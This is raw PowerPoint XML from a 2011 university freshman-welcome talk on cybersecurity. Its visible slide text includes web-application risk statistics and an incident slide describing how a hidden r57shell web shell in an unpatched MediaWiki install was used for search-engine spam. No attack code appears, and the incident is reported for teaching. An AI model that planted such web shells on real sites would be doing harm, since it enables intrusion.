              <a:t>Web Application Security Consortium statistics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>13% sites can be compromised automatically</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>49% web apps with high risk level; </a:t>
            </a:r>
          </a:p>
          <a:p>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30962522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MediaWiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as Education/Coordination Tool</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="2677656"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Share resources or useful </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>in classes and project web sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Coordinate big research proposals, e.g. Secure Smart Grids, in conjunction with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> group and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>gotomeeting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Coordinate </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cyber war competitions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Date Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>8</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0066" y="2867095"/>
            <a:ext cx="1266667" cy="1123810"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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4085858"/>
            <a:ext cx="8328724" cy="2099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258274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0025"/>
            <a:ext cx="8382000" cy="757130"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Hijacked  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTFwiki</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="1103313"/>
            <a:ext cx="8410575" cy="6297108"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>UCCS system admin reported heavy traffic from athena.uccs.edu to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and certain sites.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Apache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Httpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> logs revealed accesses of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>456.php file (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>r57shell.php) hidden in the data directory of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>iCTF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> competition</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Target:  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>google</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> search engine for a real-estate agent site and a drug store.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> was two versions old, not patched.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Excuses: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Mediawiki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> did not provide easy patch and porting to  new version takes quite  a lot of steps. Each wiki site has its own directory mingled with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code. </a:t>
            </a:r>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Freshmen Welcome 8/20/2011</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Footer Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Edward Chow</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{86B03ED4-55E6-486A-B9BC-29A44110F5E8}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="138265082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9/14/2005 4:58:15 PM&quot;&gt;&lt;Slide id=&quot;257&quot; dur=&quot;138.453&quot;/&gt;&lt;Slide id=&quot;307&quot; dur=&quot;22.094&quot;/&gt;&lt;Slide id=&quot;436&quot; dur=&quot;39.266&quot;/&gt;&lt;Slide id=&quot;438&quot; dur=&quot;15.156&quot;/&gt;&lt;Slide id=&quot;437&quot; dur=&quot;66.547&quot;/&gt;&lt;Slide id=&quot;441&quot; dur=&quot;144.687&quot;/&gt;&lt;Slide id=&quot;442&quot; dur=&quot;91.703&quot;/&gt;&lt;Slide id=&quot;443&quot; dur=&quot;100.969&quot;/&gt;&lt;Slide id=&quot;445&quot; dur=&quot;66.688&quot;/&gt;&lt;Slide id=&quot;465&quot; dur=&quot;1422.906&quot; bld=&quot;|1&quot;/&gt;&lt;Slide id=&quot;479&quot; dur=&quot;93.734&quot;/&gt;&lt;Slide id=&quot;480&quot; dur=&quot;45.938&quot;/&gt;&lt;Slide id=&quot;482&quot; dur=&quot;49.531&quot;/&gt;&lt;Slide id=&quot;483&quot; dur=&quot;46&quot;/&gt;&lt;Slide id=&quot;484&quot; dur=&quot;64.891&quot;/&gt;&lt;Slide id=&quot;481&quot; dur=&quot;51.906&quot;/&gt;&lt;Slide id=&quot;485&quot; dur=&quot;118.469&quot; bld=&quot;|114.8&quot;/&gt;&lt;Slide id=&quot;486&quot; dur=&quot;35.937&quot;/&gt;&lt;Slide id=&quot;487&quot; dur=&quot;72.266&quot; bld=&quot;|44.8&quot;/&gt;&lt;Slide id=&quot;488&quot; dur=&quot;25.672&quot; bld=&quot;|7.6|.5|.5|.5|4.8&quot;/&gt;&lt;Slide id=&quot;489&quot; dur=&quot;25.609&quot; bld=&quot;|7.1|2|7.8|2&quot;/&gt;&lt;Slide id=&quot;516&quot; dur=&quot;10.453&quot;/&gt;&lt;Slide id=&quot;490&quot; dur=&quot;118.422&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;491&quot; dur=&quot;35.25&quot;/&gt;&lt;Slide id=&quot;492&quot; dur=&quot;22.281&quot;/&gt;&lt;Slide id=&quot;493&quot; dur=&quot;24.094&quot;/&gt;&lt;Slide id=&quot;494&quot; dur=&quot;12.75&quot;/&gt;&lt;Slide id=&quot;495&quot; dur=&quot;10.531&quot;/&gt;&lt;Slide id=&quot;496&quot; dur=&quot;30.438&quot;/&gt;&lt;Slide id=&quot;497&quot; dur=&quot;20.828&quot; bld=&quot;|9.4|2.1|5.4&quot;/&gt;&lt;Slide id=&quot;498&quot; dur=&quot;14.484&quot; bld=&quot;|.7|1|2.1|5.1&quot;/&gt;&lt;Slide id=&quot;499&quot; dur=&quot;15.875&quot; bld=&quot;|5.9|3.1&quot;/&gt;&lt;Slide id=&quot;501&quot; dur=&quot;5.266&quot;/&gt;&lt;Slide id=&quot;502&quot; dur=&quot;.797&quot;/&gt;&lt;Slide id=&quot;501&quot; dur=&quot;54.375&quot;/&gt;&lt;Slide id=&quot;502&quot; dur=&quot;59.125&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;503&quot; dur=&quot;63.125&quot;/&gt;&lt;Slide id=&quot;504&quot; dur=&quot;40.031&quot;/&gt;&lt;Slide id=&quot;505&quot; dur=&quot;30.297&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;517&quot; dur=&quot;60.953&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;506&quot; dur=&quot;52.125&quot;/&gt;&lt;Slide id=&quot;507&quot; dur=&quot;113.656&quot;/&gt;&lt;Slide id=&quot;508&quot; dur=&quot;23.266&quot; bld=&quot;|0|0|0|0&quot;/&gt;&lt;Slide id=&quot;509&quot; dur=&quot;59.203&quot; bld=&quot;|0&quot;/&gt;&lt;Slide id=&quot;510&quot; dur=&quot;25.109&quot; bld=&quot;|8.6|0|2|.5|6|.5|.5|.5|.5|.5&quot;/&gt;&lt;Slide id=&quot;511&quot; dur=&quot;2.594&quot;/&gt;&lt;Slide id=&quot;510&quot; dur=&quot;26.469&quot;/&gt;&lt;Slide id=&quot;511&quot; dur=&quot;44.656&quot; bld=&quot;|5.8|5.2|.5|.5|4.1|.5|11.1&quot;/&gt;&lt;Slide id=&quot;513&quot; dur=&quot;170.953&quot;/&gt;&lt;Slide id=&quot;512&quot; dur=&quot;2.172&quot; bld=&quot;|.5&quot;/&gt;&lt;Slide id=&quot;514&quot; dur=&quot;100.922&quot;/&gt;&lt;Slide id=&quot;515&quot; dur=&quot;1.609&quot;/&gt;&lt;/Timings&gt;&lt;/WMTools&gt;"/>
</p:tagLst>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="PDC_Template_2005">
  <a:themeElements>
    <a:clrScheme name="PDC_Template_2005 4">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="18536E"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="FFB601"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="F7E993"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="B2BB1D"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="ABB3BA"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="DADADA"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FAF2C8"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A1A919"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="66FFFF"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="B51A8A"/>
      </a:folHlink>
    </a:clrScheme>
    <a:fontScheme name="PDC_Template_2005">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2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="2700000" scaled="1"/>
        </a:gradFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent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85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Segoe" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:spDef>
    <a:lnDef>
      <a:spPr bwMode="auto">
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="1" cy="1"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst/>
        </a:custGeom>
        <a:gradFill rotWithShape="0">
          <a:gsLst>
            <a:gs pos="0">
              <a:schemeClr val="accent2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="50000">
              <a:schemeClr val="accent2">
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
            <a:gs pos="100000">
              <a:schemeClr val="accent2">
                <a:gamma/>
                <a:shade val="63529"/>
                <a:invGamma/>
                <a:alpha val="70000"/>
              </a:schemeClr>
            </a:gs>
          </a:gsLst>
          <a:lin ang="2700000" scaled="1"/>
        </a:gradFill>
        <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:schemeClr val="accent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85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Segoe" pitchFamily="34" charset="0"/>
          </a:defRPr>
        </a:defPPr>
      </a:lstStyle>
    </a:lnDef>
  </a:objectDefaults>
  <a:extraClrSchemeLst>
    <a:extraClrScheme>
      <a:clrScheme name="PDC_Template_2005 1">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="194489"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB0C4"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A8A"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="PDC_Template_2005 2">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="176B6F"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABBABB"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A8A"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="PDC_Template_2005 3">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="18536E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB3BA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="0078FA"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A8A"/>
        </a:folHlink>
      </a:clrScheme>
      <a:clrMap bg1="dk2" tx1="lt1" bg2="dk1" tx2="lt2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
    </a:extraClrScheme>
    <a:extraClrScheme>
      <a:clrScheme name="PDC_Template_2005 4">
        <a:dk1>
          <a:srgbClr val="000000"/>
        </a:dk1>
        <a:lt1>
          <a:srgbClr val="FFFFFF"/>
        </a:lt1>
        <a:dk2>
          <a:srgbClr val="18536E"/>
        </a:dk2>
        <a:lt2>
          <a:srgbClr val="FFB601"/>
        </a:lt2>
        <a:accent1>
          <a:srgbClr val="F7E993"/>
        </a:accent1>
        <a:accent2>
          <a:srgbClr val="B2BB1D"/>
        </a:accent2>
        <a:accent3>
          <a:srgbClr val="ABB3BA"/>
        </a:accent3>
        <a:accent4>
          <a:srgbClr val="DADADA"/>
        </a:accent4>
        <a:accent5>
          <a:srgbClr val="FAF2C8"/>
        </a:accent5>
        <a:accent6>
          <a:srgbClr val="A1A919"/>
        </a:accent6>
        <a:hlink>
          <a:srgbClr val="66FFFF"/>
        </a:hlink>
        <a:folHlink>
          <a:srgbClr val="B51A8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21807</TotalTime>
  <Words>2257</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>370</Paragraphs>
  <Slides>31</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PDC_Template_2005</vt:lpstr>
      <vt:lpstr>Photo Editor Photo</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Outline of the Talk</vt:lpstr>
      <vt:lpstr>Cyber security is pervasive, ubiquitous, necessary, serious, fun, and profitable</vt:lpstr>
      <vt:lpstr>How to Improve Cyber Security </vt:lpstr>
      <vt:lpstr>Hacking Midterm for Fun and Grade</vt:lpstr>
      <vt:lpstr>What are Wrong with Midterm.cgi?</vt:lpstr>
      <vt:lpstr>How to Fix This Web App Vulnerability</vt:lpstr>
      <vt:lpstr>MediaWiki as Education/Coordination Tool</vt:lpstr>
      <vt:lpstr>Hijacked  iCTFwiki</vt:lpstr>
      <vt:lpstr>Prevent Mediawiki or PHP Hacks</vt:lpstr>
      <vt:lpstr>SSL Security Breach while online final is on </vt:lpstr>
      <vt:lpstr>UCCSClassApp: Towards A better CMS for iPad Client and Smart Mobile Devices</vt:lpstr>
      <vt:lpstr>An analysis of the iKee.B (duh) </vt:lpstr>
      <vt:lpstr>Installation Logic of iKee.B (duh)</vt:lpstr>
      <vt:lpstr>Cloud Computing: XaaS Terms CaaS, IaaS, MaaS, NaaS, PaaS, TaaS </vt:lpstr>
      <vt:lpstr>Cloud Computing: Public vs. Private</vt:lpstr>
      <vt:lpstr>Security Issues in Cloud Computing</vt:lpstr>
      <vt:lpstr>Dealing with Amazon Virtual Private Cloud</vt:lpstr>
      <vt:lpstr>New Initiatives in Supporting Integrated Cloud Computing</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>iCTF CyberWar Competition Experiences </vt:lpstr>
      <vt:lpstr>iCTF Puzzles</vt:lpstr>
      <vt:lpstr>iCTF puzzles</vt:lpstr>
      <vt:lpstr>iCTF 2011 and related Cyber Events</vt:lpstr>
      <vt:lpstr>Unique Security Education Programs</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Conclusion</vt:lpstr>
      <vt:lpstr>Why Choose Engineering and Computer Science? Aim High!</vt:lpstr>
      <vt:lpstr>Everything is Possible</vt:lpstr>
      <vt:lpstr>Focus on Building Solid Fundamentals</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager>Speech writer name here</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subject>Professional Developers Conference</dc:subject>
  <dc:creator>Rudolph Balaz</dc:creator>
  <dc:description>Formatter:_x000d_
Event Date: Sept. 13-16, 2005_x000d_
Event Location:_x000d_
Speech Length:_x000d_
Audience: Professional Developers, TDMs_x000d_
Key Topics:</dc:description>
  <cp:lastModifiedBy>Edward Chow</cp:lastModifiedBy>
  <cp:revision>349</cp:revision>
  <cp:lastPrinted>2011-08-18T20:22:18Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2010-04-22T14:11:49Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2011-08-19T23:09:09Z</dcterms:modified>
</cp:coreProperties>
</file>